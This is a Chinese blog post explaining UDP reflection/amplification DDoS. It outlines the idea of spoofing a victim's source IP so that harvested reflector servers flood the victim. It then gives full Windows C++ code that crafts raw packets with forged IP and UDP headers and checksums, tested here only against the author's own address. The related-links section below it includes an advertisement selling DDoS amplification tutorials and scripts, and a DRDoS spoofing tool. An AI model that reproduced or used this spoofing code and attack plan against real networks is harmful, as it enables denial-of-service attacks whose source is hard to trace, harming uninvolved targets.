UDP反射放大攻击

最新推荐文章于 2024-07-30 15:51:57 发布
最新推荐文章于 2024-07-30 15:51:57 发布
阅读量3k 收藏 10
点赞数 2
分类专栏: Penetration Test 文章标签: udp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slslslyxz/article/details/105431525
版权

UDP反射放大攻击

放大攻击原理

很多协议在响应包处理时,要远大于请求包,一个字节的请求十个字的响应,十个字节的请求一百个字的响应,这就是UDP反射放大攻击最根本的原理。

而且,最重要的一点,UDP是不稳定的,不需要请求建立连接的
那么我就有点想法了

  1. 使用SOCKRAW,伪造UDP头和IP头,是否让目标流量返回给目标自己呢?事实上 我可以一点流量都接收不到,而目标在收到请求后需要放大还要将响应返回给自己。
  1. 另外一种用法,我搜集到了很多这种服务器(当做肉鸡),我伪造UDP头和IP头,伪造为我要攻击的目标,那么这些服务器在接收到我发送的数据后,所有的响应信息全部都会返回到目标IP去,这样也可以达到攻击的效果。

正因为UDP协议是可以伪造的,所以企业在溯源时很难找到攻击者是谁。
如今DDoS产业已经泛滥,技术成本极低,黑产链已经相当的完善和成熟,各个人员的分工,资源获取,集中管控,需求中介,简易化操作工具,方便快速的发起攻击,已经成为黑产界最喜爱的方式之一。

发送原始UDP封包 实现

/*
使用IP头包含选项

创建原始套接字之后,再打开IP_HDRINCL 选项,即可在IP头中封装自己的协议,而不是仅仅使用系统预定义的协议。
一般可以使用这种方法来发送UDP和TCP数据

IP数据报格式:
Version域:这4位指定了数据报的IP版本。对IPV4来说此域值为4.
IHL(IP header length 的缩写):因为IP头长度不是固定的,所以需要这4位来确定IP数据报中数据部分的开始位置。大多数IP数据报不包含此选项,所以通常IP数据报有20个字节的头长度。
Type of service(服务端类型,TOS):包含在IPV4头中,用来区分不同类型的IP数据报
Total length:这是IP数据报的总长度,IP头加数据。这个域是16位(2字节)长,所以IP数据报大小的理论最大值是65535字节。然而数据报的长度很少有超过1500字节的。
Identification域:用来表示已发送的IPV4封包。通常,系统每发送一次封包就增加一次这个值。
Falgs和Fragment offset域:当IPV4分包被分割为较小的包时使用这2个域。DF代表不要分割(dont fragment),这是一个给路由器的命令,告诉他们不要分割此数据报,因为目标主机没有能力将它们恢复回来(例如:机器在启动时)。MF代表更多的分割(More Fragments)。
Time to live(生存时间,TTL)域:包含TTL域是为了确保数据报不会永远呆在网络里打圈。每当数据报被路由器处理时,这个域就会减1,如果减到0,此数据报就会被丢弃。
Protocol域:当IP数据报到达目的地时才使用此域,它指定了IP数据报的数据部分将要传递给哪个传输层协议,例如,值6表示数据部分要被传递给TCP,值17表示数据部分要被传递给UDP。
Header checksum 域:头校验和帮助路由器检测接收到的IP数据报中的位错误。


Source address 和 Destianation address域:指定此数据报的源IP地址和目的IP地址。
Options域:选项域是一个长度可变的域,它包含了可选的信息。最大值是40字节。

*/

#include "pch.h"
#include <iostream>
#include <WinSock2.h>
#include <ws2ipdef.h>
#include <process.h>
#pragma warning(disable:4996)
#pragma comment(lib,"ws2_32.lib")

typedef struct _IPHeader {
	u_char VIHL; //版本和首部长度 各占4bit
	u_char ToS; //服务类型
	u_short TotalLen; //总长度
	u_short ID; //标识号
	u_short Frag_Flags; //片偏移量
	u_char TTL; //生存时间
	u_char Protocol; //协议
	u_short Checksum; //首部校验和
	ULONG SrcIP;
	ULONG DestIP;
	//struct in_addr SrcIP; //源IP地址
	//struct in_addr DestIP; //目的地址
}IPHDR, *PIPHDR;


/*UDP头*/
typedef struct _udpheader {
	USHORT sourcePort; //来源端口
	USHORT destinationPort;//目标端口
	USHORT len;//封包长度
	USHORT checkSum;//校验和
}UDP_HDR,*PUDP_HDR;


/*
因为UDP是不可靠协议,所以计算校验和是可选的。
和IP的校验和不同,UDP的校验和除了包含UDP的字节外,还包含IP头中的几个域。
计算UDP校验和所需的额外的域成为伪头。UDP校验和基于如下几个域:
(针对ipv4)
32位的源IP地址
32位的目的IP地址
8位0域
8位协议与
16位UDP长度
16位源端口号
16位目的端口号
16位UDP长度
16位UDP校验和(0)
UDP静荷(payload)
*/

//计算校验和
WORD checkSum(WORD* wBuff, int nSize) {
	DWORD dwSum = 0;;
	//将数据以WORD为单位累加到wSum
	while (nSize > 1) {
		dwSum += *wBuff++;
		nSize -= sizeof(WORD);
	}

	//若出现最后还剩一个字节继续与前面结果相加(也就是为奇数的情况)。
	if (nSize) {
		dwSum += *(BYTE*)wBuff++;
	}
	while (dwSum >> 16) { //如果有高16位,将一直与低16位相加
		dwSum = (dwSum >> 16) + (dwSum & 0xFFFF);
	}
	//取反
	return (WORD)(~dwSum);
}



//计算UDP校验和
void ComputeUdpPseudoHeaderCchecksum(IPHDR * pIphdr, UDP_HDR * pUdphdr, char * payload, int payloadlen) {
	char buff[1024] = { 0 };
	char *ptr = buff;

	int checksumlen = 0;
	ULONG zero = 0;

	//源IP地址
	memcpy_s(ptr, sizeof(pIphdr->SrcIP),&pIphdr->SrcIP, sizeof(pIphdr->SrcIP));
	ptr += sizeof(pIphdr->SrcIP);
	checksumlen += sizeof(pIphdr->SrcIP);

	//目的IP地址
	memcpy_s(ptr, sizeof(pIphdr->DestIP), &pIphdr->DestIP, sizeof(pIphdr->DestIP));
	ptr += sizeof(pIphdr->DestIP);
	checksumlen += sizeof(pIphdr->DestIP);



	//8位0
	memcpy_s(ptr, 1, &zero, 1);
	ptr += 1;
	checksumlen += 1;



	//协议
	memcpy_s(ptr, sizeof(pIphdr->Protocol), &pIphdr->Protocol, sizeof(pIphdr->Protocol));
	ptr += sizeof(pIphdr->Protocol);
	checksumlen += sizeof(pIphdr->Protocol);






	//UDP长度
	memcpy_s(ptr, sizeof(pUdphdr->len), &pUdphdr->len, sizeof(pUdphdr->len));
	ptr += sizeof(pUdphdr->len);
	checksumlen += sizeof(pUdphdr->len);

	//UDP源端口
	memcpy_s(ptr, sizeof(pUdphdr->sourcePort), &pUdphdr->sourcePort, sizeof(pUdphdr->sourcePort));
	ptr += sizeof(pUdphdr->sourcePort);
	checksumlen += sizeof(pUdphdr->sourcePort);


	//UDP目的端口
	memcpy_s(ptr, sizeof(pUdphdr->destinationPort), &pUdphdr->destinationPort, sizeof(pUdphdr->destinationPort));
	ptr += sizeof(pUdphdr->destinationPort);
	checksumlen += sizeof(pUdphdr->destinationPort);

	//又是UDP长度
	memcpy_s(ptr, sizeof(pUdphdr->len), &pUdphdr->len, sizeof(pUdphdr->len));
	ptr += sizeof(pUdphdr->len);
	checksumlen += sizeof(pUdphdr->len);

	//16位的UDP校验和,置为0
	memcpy_s(ptr, sizeof(USHORT), &zero, sizeof(USHORT));
	ptr += sizeof(USHORT);
	checksumlen += sizeof(USHORT);

	//净荷
	memcpy_s(ptr, payloadlen, payload, payloadlen);
	ptr += payloadlen;
	checksumlen += payloadlen;

	//补齐到下一个16位边界
	for (int i = 0; i < payloadlen%2; i++) {
		*ptr = 0;
		ptr++;
		checksumlen++;
	}

	pUdphdr->checkSum = checkSum((WORD*)buff, checksumlen);
}

//原始套接字 接收UDP封包
unsigned int WINAPI recvThread(PVOID lpParam) {
	SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);


	SOCKADDR_IN sin;
	sin.sin_family = AF_INET;
	sin.sin_port = ntohs(4567);
	sin.sin_addr.S_un.S_addr = inet_addr("192.168.0.5");

	if (::bind(s, (SOCKADDR *)&sin, sizeof(sin)) == SOCKET_ERROR) {
		printf_s("绑定出错%d\n", GetLastError());
		closesocket(s);
		return 1;
	}


	char sz[256] = { 0 };
	SOCKADDR_IN addrRemote;
	int nLen = sizeof(addrRemote);
	printf_s("准备接收\n");
	int nRet = recvfrom(s, sz, 256, 0, (sockaddr*)&addrRemote, &nLen);
	if (nRet > 0){
		printf_s("来自ip:%s:%d,内容:%s \n", inet_ntoa(addrRemote.sin_addr), htons(addrRemote.sin_port), sz);
	}
	printf_s("接收线程结束");
	return 0;
}

//原始套接字 发送udp封包
int main()
{
	WSADATA wsaData;
	WSAStartup(MAKEWORD(2, 2), &wsaData);

	//先开始接收线程
	_beginthreadex(NULL, 0, recvThread, NULL, 0, 0);

	char Msg[] = "哈哈哈哈";
	int nMsgLen = sizeof(Msg);

	SOCKET sSend = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
	if (sSend == INVALID_SOCKET) {
		printf_s("请管理员运行\n");
		return -1;
	}

	BOOL bIncl = TRUE;
	if (setsockopt(sSend, IPPROTO_IP, IP_HDRINCL, (char*)&bIncl, sizeof(bIncl)) == SOCKET_ERROR) {
		printf_s("设置失败 %d\n",WSAGetLastError());
		closesocket(sSend);
		return -1;
	}


	char buff[1024] = { 0 };

	//ip头
	IPHDR* pIphdr = (IPHDR*)buff;
	pIphdr->VIHL = (4 << 4 | (sizeof(IPHDR) / sizeof(ULONG)));
	pIphdr->TotalLen = htons(sizeof(IPHDR) + sizeof(UDP_HDR) + nMsgLen);
	pIphdr->TTL = 128;
	pIphdr->Protocol = IPPROTO_UDP;
	pIphdr->SrcIP = inet_addr("192.168.0.5");//做测试 所以都是我
	pIphdr->DestIP = inet_addr("192.168.0.5");
	pIphdr->Checksum = checkSum((USHORT*)pIphdr, sizeof(IPHDR));


	//UDP头
	UDP_HDR* pUdphdr = (UDP_HDR*)(buff + sizeof(IPHDR));
	pUdphdr->sourcePort = htons(8888);
	pUdphdr->destinationPort = htons(4567);
	pUdphdr->len = htons(sizeof(UDP_HDR) + nMsgLen);
	pUdphdr->checkSum = 0;
	char* pPayload = buff + sizeof(IPHDR) + sizeof(UDP_HDR);
	memcpy_s(pPayload, 1024 - sizeof(IPHDR) - sizeof(UDP_HDR), Msg, nMsgLen);
	ComputeUdpPseudoHeaderCchecksum(pIphdr, pUdphdr, pPayload, nMsgLen);
	

	//设置目的地址 要和UDP头中相同
	SOCKADDR_IN sin;
	sin.sin_family = AF_INET;
	sin.sin_port = htons(4567);
	sin.sin_addr.S_un.S_addr = inet_addr("192.168.0.5");

	int nRet = sendto(sSend, buff, nMsgLen + sizeof(IPHDR) + sizeof(UDP_HDR), 0, (sockaddr*)&sin, sizeof(sin));
	if (nRet == SOCKET_ERROR) {
		printf_s("发送失败\n");
	}
	printf_s("发送完成\n");
	Sleep(10000);
	closesocket(sSend);
	WSACleanup();
}
没事干写博客玩
关注
专栏目录
几种常见的攻击方式扫盲(一)——NTP反射放大
meltsnow的博客
12-05 3635
1.什么是NTP服务? NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议 在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络时间协议)是用来使网络中...
针对头疼的UDP攻击如何定制有效的防护措施
HoewDec的博客
05-11 687
攻击工具伪造的攻击报文通常都拥有相同的特征字段,比如都包含某一字符串或整个报文内容一致,而对于UDP反射放大攻击中那些由真实网络设备发出的报文,在数据段不具备相同特征,但其目的端口都是固定的,所以不难发现UDP Flood攻击报文都具有一定的特征。反射攻击正是利用了UDP协议面向无连接、缺少源认证机制的特点,将请求包的源IP地址篡改为攻击目标的IP地址,最终服务器返回的响应包就会被送到攻击目标,形成反射攻击。在数据传输时间很短,以至于此前的连接过程成为整个流量主体的情况下,UDP也是一个好的选择。
r2dr2-udp-drdos-tool:DRDoS UDP放大工具
05-24
r2dr2-udp-drdos工具 UDP放大DRDoS工具(BETA) 创建DRDoS UDP放大攻击的简单应用程序。 特征 允许对公共src地址进行IP欺骗。 通过引入十六进制有效载荷,允许利用多重服务。 经验证的与协议的兼容性:Citrix ICA,SIP,NTP,CharGEN。 允许可配置的多线程系统。 允许在同一二进制文件上旋转系统(打开9000 / udp端口)。 请阅读以下项目的评论(包括示例视频): 西班牙语: : 英文: : 要求 .NET Framework v4.5.1(较旧的版本可能会导致崩溃) WinPcap v4.1.3 不在具有活动BCP 38入口过滤功能的网络上(仅当您想要欺骗公共IP时)。 64位操作系统。 用法 配置并加载JSON配置文件(请参阅Binary文件夹中的示例)。 选择您要使用的接口。 点击“ Empezar”
UDP攻击是什么?UDP协议中的UDP FLOOD攻击详细讲解
最新发布
qq_38647109的博客
07-30 685
反射/放大攻击攻击者利用某些支持UDP协议的公共服务(如DNS、NTP服务器)的响应机制,将请求包的源IP地址篡改为攻击目标的IP地址。攻击者通过向目标系统发送大量的UDP数据包,以消耗其网络带宽和系统资源,导致目标系统无法正常响应合法用户的请求,从而达到拒绝服务的目的。限制UDP数据包大小和速率:通过配置网络设备或软件,限制单个IP地址的UDP数据包大小和每秒接收的UDP数据包数量,以减少攻击的影响。关闭不必要的UDP服务:定期审查系统配置,关闭不必要的UDP服务端口,减少攻击面。
基于UDP的DDos反射放大攻击
weixin_33725807的博客
09-21 1377
转自:https://www.us-cert.gov/ncas/alerts/TA14-017A ProtocolBandwidth Amplification Factor DNS 28 to 54 NTP 556.9 SNMPv2 6.3 NetBIOS 3.8 SSDP 30.8 CharGEN 358.8 QOTD 140.3 BitTorrent ...
什么是UDP反射放大攻击,有什么安全措施可以防护UDP攻击
dexunyun的博客
05-02 1658
UDP是网络通信的标准协议,由于UDP数据包是无链接状态的服务,相对TCP而言,存在更少的错误检查和验证,UDP反射放大攻击就是一种利用UDP协议无连接特性进行的网络攻击攻击者通过伪造源IP地址,将大量UDP请求报文发送给反射器(如DNS服务器、NTP服务器等),这些服务器在收到请求后会回复比请求报文更大的响应报文,而这些响应报文会被错误地发送到伪造源IP地址对应的受害者主机,从而造成受害者主机的网络带宽被耗尽,甚至导致拒绝服务(DoS)攻击
盘点:常见UDP反射放大攻击的类型与防护措施
09-23 7186
本文作者为易盾实验室工程师 一、DDoS攻击简介 分布式拒绝服务攻击(Distributed Denial of Service)简称DDoS,亦称为阻断攻击或洪水攻击,是目前互联网最常见的一种攻击形式。DDoS攻击通常通过来自大量受感染的计算机(即僵尸网络)的流量,对目标网站或整个网络进行带宽或资源消耗,使目标无法处理大量数据包,导致服务中断或停止。 UDP是网络通信的标准协议,由于UDP数据包...
【转】盘点:常见UDP反射放大攻击的类型与防护措施
tpriwwq的专栏
07-19 130
Memcached支持UDP协议的访问请求,并且默认也会将UDP端口11211对外开放,因此攻击者只需要通过快速的端口扫描,便可以收集到全球大量没有限制的Memcached服务器,随后攻击者只需要向Memcached服务器的UDP:11211端口,发送伪造为源IP的攻击目标IP地址的特定指定请求数据包,服务器在收到该数据包后,会将返回数据发送至攻击目标的IP地址。
现网发现新型DVR UDP反射攻击手法记实.pdf
09-18
攻击者通过构造特定的UDP数据包,利用IoT设备的漏洞进行反射放大,从而产生比原始攻击流量大几倍的流量冲击目标网络。 1. **样本分析** 攻击样本显示,数据包的payload包含了MAC地址、IP地址、设备类型、厂商名称...
UDP协议中的 UDP Flood 攻击详细讲解
10-09
例如,针对NTP、DNS、SSDP等反射放大攻击,可以设置特定端口的过滤规则。 此外,动态指纹学习功能在攻击特征未知时发挥作用。系统能自动学习并识别有规律的攻击报文负载特征,生成过滤条件进行自动过滤,从而有效...
DNS云学堂 | 如何防范一本万利的DNS反射放大攻击
热门推荐
域名国家工程研究中心(ZDNS)的博客
01-25 1万+
一、前言 DNS诞生于上世纪80年代,就像很多新的技术出现只是为了解决一些简单的问题一样,其诞生之初也仅仅是为了解决网络上主机数量爆炸性的增长、IP地址不便于记忆的问题。其发明者可能连自己也没有想到,在几十年后的今天,互联网会发展到如此规模,DNS的应用更是如同水和空气一般无处不在。 DNS诞生的年代,互联网的规模和应用场景远不如今天复杂,更没有现如今如此严峻的网络安全环境,因此其设计之初并没有过多的考虑安全因素,基于无连接UDP协议的报文交互、尽力而为的服务方式成为了现如今互联网世界里的一个安全薄弱的
ddo放大教程+脚本
10-25
用国外G口放大 一个G口能打出30G左右的量,一直自己用的 加分价钱一分货,懂得人来 最好买两台 一台扫表 一台伪造发包 内附各种脚本 例如udp/ntp/syn/tcp/ack等 请勿使用此脚本攻击正规站 解压密码qq2682964474
NTP-Monlist-Amplification-Attack:演示NTP放大攻击
06-29
然而,NTP也存在安全风险,其中之一就是NTP Monlist放大攻击。这种攻击利用了NTP服务器的一个特性,即Monlist命令,它允许服务器返回最近与之交互过的客户端列表。攻击者可以利用这个特性发动分布式拒绝服务(DDoS)...
DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器...
djph26741的博客
08-02 328
DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90/ 简介 DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受...
东南大学:UDP反射DDoS攻击原理和防范(转)
weixin_30876945的博客
09-19 329
2013年以来,反射攻击的报道层出不穷。相对于传统的基于僵尸网络的DDoS攻击,由于反射放大攻击不需要僵尸进程的帮助,因此实现和控制过程相对简单,因此成本较低,且具有放大效果显著、追溯困难的特点。这给传统的DDoS攻击的防护带来新的挑战。本文将对反射攻击的原理进行分析,讨论主流攻击协议的主要漏洞,并给出相应的防范提建议。   反射DDoS攻击的原理   分布式拒绝服务(DDoS:Distrib...
阿里云linux服务器,memcached被利用UDP反射攻击
wsyzxss的博客
03-05 2609
(此方法适用于没用过UDP协议的项目) 表现可能是 ,大量宽带异常外流,网站不能正常访问。 如下如,本服务器宽带是10M的。 , 。 2.打开服务器的实例,的 ,本实例安全组,点击‘配置规则’;(此方法适用于没用过UDP协议的项目)   3.添加安全规则 添加内容     保存。                        ...
【重要安全预警】Memcached被利用UDP反射攻击漏洞预警
weixin_40581617的博客
03-06 747
本周,阿里云安全中心监测到互联网上存在利用Memcached服务漏洞进行的恶意攻击。如果客户默认开放UDP协议且未做访问控制,在运行Memcached服务时可能会被黑客利用,导致出方向的带宽消耗或CPU资源消耗。 阿里云云数据库Memcache版未使用UDP协议,默认不受该问题影响,用户可以放心使用。同时,阿里云提示用户关注自身业务并启动应急排查工作。 受影响范围: 用户自建,并对外
8.下列常用端口,可能用于反射放大DDoS攻击的有( 2分) A. DNS 53/tcp B.HTTPS 443/tcp C. memcache 11211/udp D.NTP 123/udp
06-13
- Memcached 端口 11211/udp(选项 C),可以利用 Memcached 服务的响应报文进行反射放大攻击。 - NTP 端口 123/udp(选项 D),可以利用 NTP 服务的响应报文进行反射放大攻击。 而选项 B 中的 HTTPS 端口 443/tcp ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

没事干写博客玩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值